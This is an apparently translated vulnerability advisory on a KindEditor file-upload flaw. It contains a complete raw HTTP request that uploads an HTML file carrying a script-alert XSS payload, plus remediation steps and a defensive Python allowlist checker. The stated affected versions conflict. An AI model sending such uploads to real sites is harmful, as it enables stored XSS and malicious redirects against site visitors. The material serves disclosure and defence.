KindEditor file upload vulnerability

The vulnerability lies in the KindEditor editor: .txt and .html files can be uploaded, the php/asp/jsp/asp.net server-side variants are all affected, and the vulnerability is present in KindEditor versions <= 4.1.5.
Inside the uploaded HTML, hidden (SEO spam) links and XSS payloads can be embedded. KindEditor's uploadbutton.html is the file-upload page; it POSTs directly to /upload_json.*?dir=file, and the permitted upload extensions include htm and txt: extTable.Add("file","doc,docx,xls,xlsx,ppt,htm,html,txt,zip,rar,gz,bz2")
Because the upload_json.* upload handler in KindEditor can be called directly, htm and html files can be uploaded to the server, and a user can upload one containing code that redirects visitors to an illicit site, turning the editor into a vehicle for a malicious attack.
KindEditor version < 4.1.12
The vulnerability is present in KindEditor <= 4.1.12, so first check the editor version.
1. Check the version information
http://www.xxx.com/kindeditor//kindeditor.js
2. Verify the vulnerability
Request packet
POST /kindeditor/asp/upload_json.asp?dir=file HTTP/1.1
Host: www.xxx.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------283422705626536477632563104216
Content-Length: 260
Connection: close
Cookie: ASPSESSIONIDQACQQBTT=XXXXXXXXXXXX
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache
-----------------------------283422705626536477632563104216
Content-Disposition: form-data; name="imgFile"; filename="1.html"
Content-Type: application/octet-stream
<script>alert('1')</script>
-----------------------------283422705626536477632563104216--
Response packet
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Server: Microsoft-IIS/10.0
Set-Cookie: ASPSESSIONIDSQBRRCAB=BNLFKMXXXXXXXXM; path=/
X-Powered-By: ASP.NET
Date: Thu, 09 Sep 2021 07:33:15 GMT
Connection: close
Content-Length: 94
{"error":0,"url":"\/kindeditor\/asp\/..\/attached\/file\/20210909\/20210909153396539653.html"}
Remediation
1. Delete upload_json.* and file_manager_json.* outright
2. Update KindEditor to the latest version
Reference links
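The check below is an added example, not KindEditor's own code: it parses a raw multipart upload request like the one shown above, pulls out the imgFile filename, and compares it against the extension allowlist quoted from upload_json.* and against a hardened allowlist with htm, html and txt removed (the sample request, its host and its boundary are constructed for the example).

```python
import re

# Allowlist as shipped in the affected KindEditor upload_json.* (taken from the page).
WEAK_FILE_EXTS = frozenset("doc,docx,xls,xlsx,ppt,htm,html,txt,zip,rar,gz,bz2".split(","))
# Hardened allowlist: the browser-renderable types (htm, html, txt) removed.
HARDENED_FILE_EXTS = WEAK_FILE_EXTS - {"htm", "html", "txt"}

BOUNDARY_RE = re.compile(rb"boundary=([^\r\n;]+)", re.I)
FILENAME_RE = re.compile(rb'Content-Disposition:[^\r\n]*filename="([^"]*)"', re.I)
TARGET_RE = re.compile(rb"^POST\s+\S*/upload_json\.\w+\?(?:.*&)?dir=file\b", re.I)

def parse_upload_filename(raw_request: bytes):
    """Return the filename of the 'imgFile' part of a raw multipart POST, or None."""
    head, _, body = raw_request.partition(b"\r\n\r\n")
    m = BOUNDARY_RE.search(head)
    if not m:
        return None
    delimiter = b"--" + m.group(1).strip().strip(b'"')
    for part in body.split(delimiter):
        fm = FILENAME_RE.search(part)
        if fm and b'name="imgFile"' in part:
            return fm.group(1).decode("utf-8", "replace")
    return None

def extension_of(filename: str) -> str:
    """Last extension of the bare filename, case-folded; '' if none (path parts stripped)."""
    base = filename.replace("\\", "/").rsplit("/", 1)[-1]
    return base.rsplit(".", 1)[-1].lower() if "." in base else ""

def is_allowed(filename: str, allowlist=HARDENED_FILE_EXTS) -> bool:
    ext = extension_of(filename)
    return ext != "" and ext in allowlist

def review_upload(raw_request: bytes) -> dict:
    """Flag a dir=file upload and say whether each allowlist would have accepted it."""
    first_line = raw_request.split(b"\r\n", 1)[0]
    name = parse_upload_filename(raw_request)
    return {"is_file_upload": bool(TARGET_RE.match(first_line)), "filename": name,
            "weak_allowed": name is not None and is_allowed(name, WEAK_FILE_EXTS),
            "hardened_allowed": name is not None and is_allowed(name)}

# Constructed sample mirroring the request shown above (host and boundary are made up).
SAMPLE_REQUEST = (
    b"POST /kindeditor/asp/upload_json.asp?dir=file HTTP/1.1\r\nHost: www.example.com\r\n"
    b"Content-Type: multipart/form-data; boundary=----abc123\r\n\r\n"
    b"------abc123\r\nContent-Disposition: form-data; name=\"imgFile\"; filename=\"1.html\"\r\n"
    b"Content-Type: application/octet-stream\r\n\r\n<script>alert('1')</script>\r\n"
    b"------abc123--\r\n"
)
```

Running review_upload(SAMPLE_REQUEST) shows the weak allowlist accepting 1.html while the hardened one rejects it; the same function can be fed captured requests when triaging logs.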
https://www.anquanke.com/post/id/171422
https://www.cnblogs.com/backlion/p/10421405.html